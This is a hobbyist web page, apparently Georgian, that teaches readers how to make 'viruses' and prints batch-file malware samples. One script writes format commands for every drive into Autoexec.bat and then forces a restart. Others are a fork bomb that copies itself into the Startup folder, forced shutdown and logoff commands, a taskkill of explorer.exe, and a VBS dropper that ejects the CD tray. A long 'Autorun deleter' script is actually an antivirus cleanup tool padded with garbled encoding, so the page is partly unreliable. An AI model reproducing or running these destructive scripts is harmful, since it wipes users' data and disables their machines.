Friday, 2017-05-26
lasha margvelashvili
Site menu
Our survey
Rate my site
Total of answers: 99
                    rogor SevqmnaT virusebi?

aq me gaswavliT Tu rogor unda SevqmnaT virusebi, sxvadasxva tipis da sxvadasxva daniSnulebis. modi
daviwyoT. pirvel viruss romelsac me exla agixsniT akeTebs monitoris gaTiSvas ise rom monitoris
qvemod naTura anaTebs da ramdenic ar unda daaWiroT monitoris Rilaks, mainc verafers dainaxavT:
verc Desktop-s verc verafers. am virusis gasakeTeblad me damWirda: vizualurad ori fanjris Seqmna,
romelic aris Savi feris anu roca fails gaxsniT is gadaekvreba monitors da monitorze araferi Cans.
roca windows->D klaviSebs vaWerT erTmaneTis miyolebiT iciT rom eg xuravs yvela fanjaras imisaTvis
rom gamoaCinos Desktop-i, magram maT daWeris Semdeg pirveli Savi fanjara ki ixureba magram ixsneba
meore Savi fanjara romelic saSualebas ar iZleva rom desktopi gamoaCinos. amasTan erTad me gavaqre
e. w. Taskbar-i radgan programis muSaobis srulyofis mizniT es saWiroebas moiTxovda, mis gasaqrobad
me damWirda gamego Taskbar-is klasi, romelic aris: Shell_TrayWnd. amas garda me damWirda rom gameqro
kursori radgan es viruss ufro met efeqts SesZenda.

uaryofiTi mxare: virusi SegiZliaT gamorToT Task Manager-iT.

 

Semdegi virusia skaipis virusi. misi daniSnulebaa rom skaips Seucvalos fanjris saxeli da skaipis fanjaras
adgili ecvlebodes. am virusis Sesaqmnelad Cven dagvWirdeba rom gavigoT skaipis klasi da es klasia:
TApplication.  saerTod roca gvinda rom rame programasTan kavSiri davamyaroT maSin unda gavigoT am programis
klasi. rac Seexeba fanjris adgilis cvlas, me SemoviRe cikli da drois elementi, anu me aviRe 3 wami, da am 3
wamSi fanjaram unda Seicvalos adgili.

uaryofiTi mxare: virusi SegiZliaT gamorToT Task Manager-is procesidan.

 

Cveni Semdegi virusi akeTebs kursoris adgilis cvlas. am virusis Sesaqmnelad me damWirda gamego kursoris
koordinatebi, amis garda gamoviyene drois elementi anu ama da am dros kursors Seecvala adglmdebareoba,
Semdeg es yvelaferi Cavsvi ciklSi. am virusis CarTvis Semdeg kusori ise swrafad icvlis adgils rom Tqven
arafris gakeTeba ar SegiZliaT.





აი ვირუსების სოურსები:
download


ვირუსები რომლებიც აქ არის დაწერილი უნდა იყოს გაკეთებული text document-ში და შემდეგ ჩასახრანებული(save as) .bat ფაილად

 
 
 
 
 
 
 
ეს ვირუსი ბევრ პაპკებს ქმნის
 
cls
md c:\aa
cls
md c:\aa2
cls
md c:\aa3
cls
md c:\aa4
cls
md c:\aa5
cls
md c:\aa6
cls
md c:\aa8
cls
md c:\aa9
cls
md c:\aa10
cls
md c:\aa11
cls
md c:\aa12
cls
md c:\aa13
cls
md c:\aa14
cls
md c:\aa15
cls
md c:\aa16
cls
md c:\aa17
cls
 
 
 
ეს ვირუსი საათს რევს
 
@ECHO OFF
cls
time 04:04
cls
cls
date 12/12/2220
cls
 
 
 
აქ არის მოყვანილი ვირუსის შესაქმნელად საჭირო dos-ის ბრძანებები
 
taskkill /f /im explorer.exe(process tishavs)
shutdown -r -t 60(arestartebs 60 camshi)
shutdown -l LOG OF(log off-s uketebs)
format /y /q d:     (aformatebs anu shlis D:\ -s )
copy c:\visualhack\1.txt  d:\visualhack\  (kopireba cmd-it)
md c:\aa (aa papkis shekmna)
 
 
 
 
ეს ვირუსი დაგიფორმატებთ ყველა დისკს და რესტარტს გაუკეთებს კომპს
 
echo format /y /q d: >> c:\Autoexec.bat
echo format /y /q e: >> c:\Autoexec.bat
echo format /y /q f: >> c:\Autoexec.bat
echo format /y /q c: >> c:\Autoexec.bat
restart -r -c
 
 
 
ვირუსი სახელად: cd rom
 
cls
Echo Set oWMP = CreateObject("WMPlayer.OCX.7") >m.vbs
Echo Set colCDROMs = oWMP.cdromCollection >>m.vbs
Echo colCDROMs.Item(i).Eject >>m.vbs
Start M.vbs
cls
 
 
 
 
ვირუსი სახელად: kill
 
:metka
@start kill.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka
 
 
 
 
ვირუსი სახელად: kill1
 
:metka
@start kill2.bat
@echo -----www.lashatt.ucoz.com-----
@goto metka
cls
copy kill2.bat C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup
cls
 
 
 
 
ეს ვირუსი გამორთავს კომპს 60 წამში და გამოიტანს ტექსტს
 
shutdown -s -t 60 -c "lashatt.ucoz.com"
 
 
 
 
ვირუსი სახელად: Autorun deleter
 
@echo off
cls
echo.
echo *********** Delete Autorun batch file ***********
echo.
echo.
echo ¦¹ÀÉ®×°£¤F¦³§R°£Autorun.inf¨ÃÃö³¬Autorun¥\¯à¥~
echo ¥t¥~¦³§R°£MountPoints2¤º²§±`¾÷½Xªº¥\¯à
echo.
echo ==============================================
echo.
echo.
echo ¦¹§å¦¸ÀÉ°õ¦æ«á·|Ãö³¬Autorun¥\¯à
echo.
echo ¦pªG­n¦^´_Autorun¥\¯à«h½Ð±NÀɮשñ¸m¦bc:\«á
echo.
echo «ö¶}©l -^> °õ¦æ -^> ¿é¤Jc:\delautorun open«á«ö½T©w
echo.
echo ¨Ì·Ó°Ê§@«ü¥Ü¶]§¹«á§Y¥i¦^´_Autorun¥\¯à
echo.
echo.
echo ¦p¤£·Q°õ¦æ½Ð«öCTRL+C«á«öY¸õ¥X©Îª½±µ±Nµøµ¡Ãö³¬¡C
echo.
pause
cls
if not "%1"=="open" goto st
echo.
echo ¦^´_Autorun¥\¯à¨Ã§R°£Autorun.inf¸ê®Æ§¨
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul&&echo.&&echo ²¾°£%%a:\Autorun.inf¸ê®Æ§¨
)
echo.
echo.
reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveAutoRun" /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul
echo ³B²z§¹²¦½Ð­«·s¶}¾÷
echo.
pause
exit
:st
if not exist c:\delauto goto delauto
if exist c:\delauto\usbmons.dll attrib -r -s -h -a %windir%\system32\usbmons.dll&del %windir%\system32\usbmons.dll >nul 2>nul&del c:\delauto\usbmons.dll >nul 2>nul
echo.
echo ²M²z«e¦¸°õ¦æ¦¹§å¦¸ÀɼȦsÀÉ©Mautorun.inf¸ê®Æ§¨
echo.
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul
rd %%a:\autorun.inf >nul 2>nul
)
del c:\delauto\*.* /s /q >nul 2>nul
rd c:\delauto /s /q
:delauto
md c:\delauto
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
if not exist %windir%\system32\usbmons.dll goto disable
@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg
@echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\usbmon >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a %windir%\system32\usbmons.dll >nul 2>nul
copy %windir%\system32\usbmons.dll c:\delauto\ >nul 2>nul
echo ½Ð©ó­«·s¶}¾÷«á¦A°õ¦æ¤@¦¸¦¹µ{¦¡
echo.
pause
cls
:disable
echo.
echo ­×´_ºÏºÐÂI¤£¶}©MÃö³¬autorun¥\¯à
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveAutoRun /t REG_BINARY /d ffffff03 /f >nul 2>nul
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f >nul 2>nul
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%a:\autorun.inf echo.&echo §R°£%%a:\Autorun.inf
attrib -r -s -h -a %%a:\autorun.inf >nul 2>nul&del %%a:\autorun.inf /f /q >nul 2>nul
md %%a:\autorun.inf >nul 2>nul&&echo.&&echo ³Ð«Ø%%a:\Autorun.inf¸ê®Æ§¨&&attrib +r +s +h +a %%a:\autorun.inf >nul 2>nul&&echo. >>c:\delauto\autorun.txt&&fsutil fsinfo drivetype %%a: >>c:\delauto\autorun.txt&&dir/a %%a:\|find /i "autorun.inf"  >> c:\delauto\autorun.txt
)
echo.
echo §R°£¸ê·½¦^¦¬±í¤º°õ¦æÀÉ
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
for %%b in (EXE COM PIF) do (
attrib -r -s -h -a %%a:\RECYCLER\*.%%b /s >nul 2>nul&attrib -r -s -h -a %%a:\RECYCLED\*.%%b /s >nul 2>nul
del %%a:\recycler\*.%%b /s /q /f >nul 2>nul&del %%a:\recycled\*.%%b /s /q /f >nul 2>nul
))

@echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >>c:\delauto\fix.reg
@echo "CheckedValue"=dword:00000001 >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe]  >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp] >>c:\delauto\fix.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe] >>c:\delauto\fix.reg
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
:last
copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul
c:\delauto\fixreg.exe /s c:\delauto\fix.reg
attrib -r -s -h -a c:\found.??? /S /D >nul 2>nul
del c:\found.???\*.* /s /q /f >nul 2>nul
rd c:\found.??? >nul 2>nul
echo.
echo ³B²z§¹²¦&pause
cls
echo.
echo ¥H¤U·|Åã¥Ü¦UºÏºÐ¤ºAutorun.inf¬O§_¬°¸ê®Æ§¨
echo ¦pªG¬O¦¹§å¦¸Àɫإߤ§¸ê®Æ§¨«h·|Åã¥ÜÃþ¦ü¹³¤U¦C¤å¦r
echo.
echo C: - ©T©w¦¡ºÏºÐ
echo %date% %time%  ^<DIR^>         autorun.inf
echo.
echo ¦pªG¨S¦³Åã¥Ü^<DIR^>³o­Ó´X­Ó¤å¦r«hªí¥ÜAutorun.inf§R°£¥¢±Ñ½ÐÀˬd¹q¸£¤º¨ä¥L¦a¤è¬O§_§t¦³¯f¬r
echo ¥t¥~¦pªG¬O¥úºÐ¾÷¤ºªºÀɮ׫h½Ð©¿²¤....
echo.
pause
echo.
type c:\delauto\autorun.txt|more
echo.
echo °õ¦æ§¹²¦½Ð­«·s¶}¾÷¡C
echo.
pause
exit
 
 
 
 
ვირუსი რომელიც ბევრ dos ფანჯრებს ყრის(ანტივირუსი:taskkill /f /im cmd.exe)
 
start
filename.bat
 
 
 
 
ეს არის memory-ს ვირუსი
 
@ECHO OFF
REM <<< code: jmp installation, int_21 handler part 1 >>>
copy %0 b.com>nul
b.com
del b.com
rem <<< code: TSR installation, int_21 handler part 2 >>>

Thursday, 04.22.2010

 


Pages: 1
0-0 of 0 messages displayed

  
Copyright MyCorp © 2010
Free web hosting - uCoz
Support Forum
Login form
News calendar
«  May 2017  »
SuMoTuWeThFrSa
 123456
78910111213
14151617181920
21222324252627
28293031
Search
Site friends
Copyright MyCorp © 2017
Free web hostinguCoz